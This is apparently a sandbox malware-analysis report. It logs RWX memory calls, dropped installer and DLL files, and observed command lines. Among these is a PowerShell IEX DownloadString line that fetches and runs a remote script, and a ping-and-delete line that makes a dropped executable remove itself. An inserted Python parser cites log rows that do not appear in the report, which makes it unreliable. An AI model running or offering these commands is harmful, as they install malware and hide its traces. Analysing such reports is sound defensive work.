process_identifier: 2384
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 53248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00440000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2524
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 77824
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d0e000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2524
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 1769472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ae0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3ac1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d40000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2956
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00122000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff000e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00170000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
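The memory records above all follow one layout: a bare API name, a blank line, key: value argument lines, then a trailer with the Status, Return and Repeated columns from the table header (the RegOpenKeyExW rows further down the page print only two numbers). The Python below is an added example, not part of the ZeroBOX report, that parses an abridged excerpt of those records (copied from this page, with the stack_dep_bypass, stack_pivoted and process_handle lines dropped) and summarises PAGE_EXECUTE_READWRITE activity per PID; reading the first trailer number as Status and the second as Return follows the column header on the page.

```python
"""Parse ZeroBOX/Cuckoo-style API call records and summarise RWX memory activity."""
import re
from dataclasses import dataclass, field
from typing import Optional

API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")      # bare API name opens a record
ARG_RE = re.compile(r"^([a-z_]+):\s?(.*)$")      # "key: value" argument line
TRAILER_RE = re.compile(r"^\d+(?: \d+){1,2}$")   # "status return [repeated]" closes it


@dataclass
class ApiCall:
    api: str
    args: dict = field(default_factory=dict)
    status: Optional[int] = None
    ret: Optional[int] = None
    repeated: Optional[int] = None

    def num(self, key):
        """'64 (PAGE_EXECUTE_READWRITE)' -> 64, '0x10001000' -> 268439552."""
        return int(self.args[key].split()[0], 0)


def parse_calls(text):
    calls, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if API_RE.match(line):
            cur = ApiCall(api=line)
            calls.append(cur)
        elif cur is not None and TRAILER_RE.match(line):
            nums = [int(n) for n in line.split()]
            cur.status, cur.ret = nums[0], nums[1]
            cur.repeated = nums[2] if len(nums) == 3 else None
            cur = None
        elif cur is not None and (m := ARG_RE.match(line)):
            cur.args[m.group(1)] = m.group(2)
    return calls


def rwx_summary(calls):
    """Per PID: RWX allocate/protect calls, distinct base pages, bytes, heap_dep_bypass hits."""
    out = {}
    for c in calls:
        if c.api not in ("NtAllocateVirtualMemory", "NtProtectVirtualMemory"):
            continue
        if c.num("protection") != 0x40:          # PAGE_EXECUTE_READWRITE only
            continue
        size_key = "region_size" if c.api == "NtAllocateVirtualMemory" else "length"
        pid = int(c.args["process_identifier"])
        s = out.setdefault(pid, {"calls": 0, "pages": set(), "bytes": 0, "heap_dep_bypass": 0})
        s["calls"] += 1
        s["pages"].add(c.num("base_address"))
        s["bytes"] += c.num(size_key)
        s["heap_dep_bypass"] += int(c.args.get("heap_dep_bypass", "0"))
    return out


# Abridged excerpt of the records on this page (stack_*/process_handle lines removed).
SAMPLE = r"""
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2956
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d3f000
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 589824
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
1 0 0

NtAllocateVirtualMemory

process_identifier: 2956
region_size: 4096
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
1 0 0

NtProtectVirtualMemory

process_identifier: 2624
heap_dep_bypass: 1
length: 1495040
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
1 0 0

RegOpenKeyExW

regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WPS Office
access: 0x02000000
2 0
"""
```

rwx_summary(parse_calls(SAMPLE)) reports PID 2956 only: three RWX calls over two distinct base pages, 598016 bytes in total and one heap_dep_bypass hit; the PAGE_EXECUTE_READ transition in PID 2624 is left out, and the two-number RegOpenKeyExW trailer parses with repeated set to None.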
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 11953926144
free_bytes_available: 0
root_path: C:
total_number_of_bytes: 0
1 1 0
regkey .*Kingsoft
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_1.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\imageformats\qsvg.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\extensibility.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\stdole.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\7zS438C.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\ucrtbase.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\7zS4689.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\7zS4D99.tmp\Install.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5WidgetsKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5SvgKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5GuiKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\platforms\qwindows.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\styles\qwindowsvistastyle.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\iconengines\qsvgicon.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\API-MS-Win-core-xstate-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\printsupport\windowsprintersupport.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\platforms\qdirect2d.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\kpacketui.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_codecvt_ids.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msaddndr.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_2.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\concrt140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\73456c80a6\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')
cmdline C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
cmdline "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
file C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
file C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\gdiplus.dll
file C:\Users\test22\AppData\Local\Temp\nss8B83.tmp\System.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\staticlittlesource[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5CoreKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5WinExtrasKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140_1.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\nss8B83.tmp\AccessControl.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\winamp58_3660_beta_full_en-us[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\setup[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\iconengines\qsvgicon.dll
file C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AAAd1[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\msaddndr.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-console-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\styles\qwindowsvistastyle.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\clip64[1].dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\qt\plugins\imageformats\qsvg.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5GuiKso.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\kpacketui.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\Qt5SvgKso.dll
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\toolspub1[1].exe
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\wps\~1a70025\CONTROL\office6\api-ms-win-crt-conio-l1-1-0.dll
wmi SELECT * FROM Win32_Processor
wmi <INVALID POINTER>
